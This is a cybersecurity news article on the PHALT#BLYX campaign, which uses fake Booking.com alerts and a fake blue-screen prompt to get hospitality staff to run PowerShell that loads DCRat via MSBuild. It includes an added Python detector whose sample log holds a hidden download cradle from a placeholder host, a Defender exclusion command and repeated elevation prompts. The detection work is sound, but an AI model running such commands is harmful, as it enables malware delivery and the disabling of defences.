
CYBER SYRUP
Delivering the sweetest insights on cybersecurity.
PHALT#BLYX Campaign Uses Fake Booking.com Alerts to Deploy DCRat in European Hospitality Attacks

Cybersecurity researchers have identified a sophisticated phishing and malware campaign, dubbed PHALT#BLYX, targeting the European hospitality sector. The operation relies on highly convincing social engineering techniques that impersonate Booking.com and exploit user trust to deploy the DCRat remote access trojan. By combining fake system errors, trusted Windows utilities, and layered evasion techniques, the attackers demonstrate a mature understanding of modern endpoint defenses and human behavior.
Context
The hospitality industry remains a prime target for cybercriminals due to its high transaction volume, seasonal workforce, and reliance on third-party booking platforms. Threat actors increasingly favor “living-off-the-land” techniques that abuse legitimate system tools, reducing the likelihood of detection. PHALT#BLYX reflects this trend, blending phishing, user-driven execution, and native Windows binaries into a seamless intrusion chain.
What Happened
According to researchers at Securonix, the campaign was observed in late December 2025. Victims received phishing emails impersonating Booking.com, warning of unexpected reservation cancellations.
The messages directed recipients to a spoofed website designed to mimic Booking.com. From there, victims were funneled through a fake CAPTCHA and presented with a fabricated Blue Screen of Death error instructing them to manually run a command. Users who followed these steps unknowingly initiated a malware infection.
Technical Breakdown
The attack hinges on convincing victims to execute malicious PowerShell commands themselves. These commands download a malicious MSBuild project file, which is executed using the legitimate Windows utility MSBuild.exe.
This technique enables attackers to:
Deploy the DCRat malware payload
Modify Microsoft Defender settings to evade detection
Establish persistence via the Startup folder
Disable security controls when administrative privileges are granted
If elevated privileges are unavailable, the malware repeatedly triggers User Account Control prompts in an attempt to coerce user approval. As a diversion, the script opens a legitimate Booking.com administrative page to reduce suspicion.
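The execution chain above leaves a recognisable trail in process-creation telemetry: a user-launched shell that downloads content, MSBuild.exe building a project from a user-writable directory, Defender preference changes, and bursts of elevation requests. The script below is an added example, not code from the article or from Securonix, that applies heuristic detection rules for those four behaviours to constructed Sysmon-style Event ID 1 records in JSON Lines form. The field names follow the Sysmon schema; the GUIDs, paths, hostnames and command lines are made up for the example, and the regular expressions are illustrative heuristics rather than vendor signatures.

```python
"""Heuristic detection of the PHALT#BLYX-style execution chain.

Added example (not from the article or Securonix). Input: constructed
Sysmon Event ID 1 records as JSON Lines; field names follow Sysmon,
values are invented for this example.
"""
import json
import re
from collections import Counter

# Constructed sample telemetry. Events {a1}..{a6} model the chain described
# in the article; {b1} and {b2} are benign controls that must not alert.
SAMPLE_LOG = r"""
{"ProcessGuid":"{a1}","ParentProcessGuid":"{a0}","User":"HOTEL\\frontdesk","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -w hidden -c \"iwr http://booking-alert.invalid/p.xml -OutFile $env:TEMP\\p.xml\""}
{"ProcessGuid":"{a2}","ParentProcessGuid":"{a1}","User":"HOTEL\\frontdesk","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe","CommandLine":"MSBuild.exe C:\\Users\\frontdesk\\AppData\\Local\\Temp\\p.xml"}
{"ProcessGuid":"{a3}","ParentProcessGuid":"{a2}","User":"HOTEL\\frontdesk","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -c \"Add-MpPreference -ExclusionPath C:\\Users\\frontdesk\\AppData\\Local\\Temp\""}
{"ProcessGuid":"{a4}","ParentProcessGuid":"{a3}","User":"HOTEL\\frontdesk","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -c \"Start-Process powershell -ArgumentList '-File C:\\Users\\frontdesk\\AppData\\Local\\Temp\\run.ps1' -Verb RunAs\""}
{"ProcessGuid":"{a5}","ParentProcessGuid":"{a3}","User":"HOTEL\\frontdesk","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -c \"Start-Process powershell -ArgumentList '-File C:\\Users\\frontdesk\\AppData\\Local\\Temp\\run.ps1' -Verb RunAs\""}
{"ProcessGuid":"{a6}","ParentProcessGuid":"{a3}","User":"HOTEL\\frontdesk","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -c \"Start-Process powershell -ArgumentList '-File C:\\Users\\frontdesk\\AppData\\Local\\Temp\\run.ps1' -Verb RunAs\""}
{"ProcessGuid":"{b1}","ParentProcessGuid":"{b0}","User":"HOTEL\\dev","ParentImage":"C:\\Program Files\\Microsoft Visual Studio\\devenv.exe","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe","CommandLine":"MSBuild.exe C:\\src\\HotelWeb\\HotelWeb.csproj"}
{"ProcessGuid":"{b2}","ParentProcessGuid":"{b0}","User":"HOTEL\\frontdesk","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -c \"Get-ChildItem $env:USERPROFILE\\Documents\""}
"""

# Heuristic patterns (assumptions for this example, not vendor signatures).
DOWNLOAD_CRADLE = re.compile(
    r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|curl|wget)\b",
    re.I)
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop)\\|\\Windows\\Temp\\", re.I)
DEFENDER_TAMPER = re.compile(
    r"(Set-MpPreference|Add-MpPreference|DisableRealtimeMonitoring|ExclusionPath)", re.I)
UAC_TRIGGER = re.compile(r"Start-Process\b.*-Verb\s+RunAs\b", re.I)
USER_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
UAC_BURST_THRESHOLD = 3  # prompts from one parent before we call it coercion


def basename(win_path):
    """Last component of a Windows path, lower-cased (os.path is not used
    because the analysis host may not be Windows)."""
    return win_path.rsplit("\\", 1)[-1].lower()


def load_events(text):
    """Parse JSON Lines into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events):
    """Return a list of findings, one dict per matched rule."""
    findings = []
    uac_by_parent = Counter()
    for ev in events:
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        guid = ev.get("ProcessGuid")
        # Rule 1: shell started from the desktop (Run dialog / explorer) that
        # immediately fetches remote content, the ClickFix-style first step.
        if image in USER_SHELLS and parent == "explorer.exe" and DOWNLOAD_CRADLE.search(cmd):
            findings.append({"rule": "user_launched_download_cradle", "process_guid": guid})
        # Rule 2: MSBuild.exe spawned by a user shell or building a project
        # from a user-writable location; legitimate builds come from IDEs/CI
        # and source trees, as the benign control {b1} shows.
        if image == "msbuild.exe" and (parent in USER_SHELLS or USER_WRITABLE.search(cmd)):
            findings.append({"rule": "msbuild_untrusted_project", "process_guid": guid})
        # Rule 3: any Defender preference tampering on the command line.
        if DEFENDER_TAMPER.search(cmd):
            findings.append({"rule": "defender_tamper", "process_guid": guid})
        # Rule 4 (aggregated below): repeated elevation requests from one parent.
        if UAC_TRIGGER.search(cmd):
            uac_by_parent[ev.get("ParentProcessGuid")] += 1
    for parent_guid, n in uac_by_parent.items():
        if n >= UAC_BURST_THRESHOLD:
            findings.append({"rule": "repeated_uac_prompts",
                             "process_guid": parent_guid, "count": n})
    return findings


def analyze(log_text):
    """Convenience wrapper: JSON Lines text in, findings out."""
    return detect(load_events(log_text))


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Rule 2 is the one most worth tuning per environment: build servers and developer workstations run MSBuild.exe constantly, so the parent-process and path conditions, not the binary name, carry the signal. Rule 4 aggregates by parent GUID rather than alerting on a single elevation request, since one `-Verb RunAs` is routine administration while three in a row from the same parent is the coercion pattern the article describes.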
Impact Analysis
Once deployed, DCRat provides attackers with extensive control over infected systems. Capabilities include keystroke logging, command execution, credential harvesting, and the ability to deploy additional payloads such as cryptocurrency miners. The use of euros in phishing emails and Russian-language artifacts within the payload suggests deliberate targeting and potential links to Russian-speaking threat actors.
Why It Matters
PHALT#BLYX illustrates how modern cyberattacks increasingly blur the line between technical exploitation and psychological manipulation. Rather than relying on software vulnerabilities alone, attackers weaponize trust, urgency, and familiar tools to bypass defenses. Organizations that focus solely on patching without addressing user behavior and process controls remain exposed.
Expert Commentary
Securonix researchers note that the campaign demonstrates “a deep understanding of modern endpoint protection mechanisms.” The use of trusted binaries like MSBuild.exe, combined with aggressive security tampering, highlights how attackers adapt to hardened environments by shifting execution responsibility onto the victim.
Key Takeaways
The PHALT#BLYX campaign targets European hospitality organizations using Booking.com-themed phishing
Fake BSoD recovery instructions trick users into executing malicious PowerShell commands
Legitimate Windows tools are abused to evade detection and maintain persistence
DCRat enables full remote access and follow-on malware deployment
User awareness and execution controls are critical to mitigating these attacks

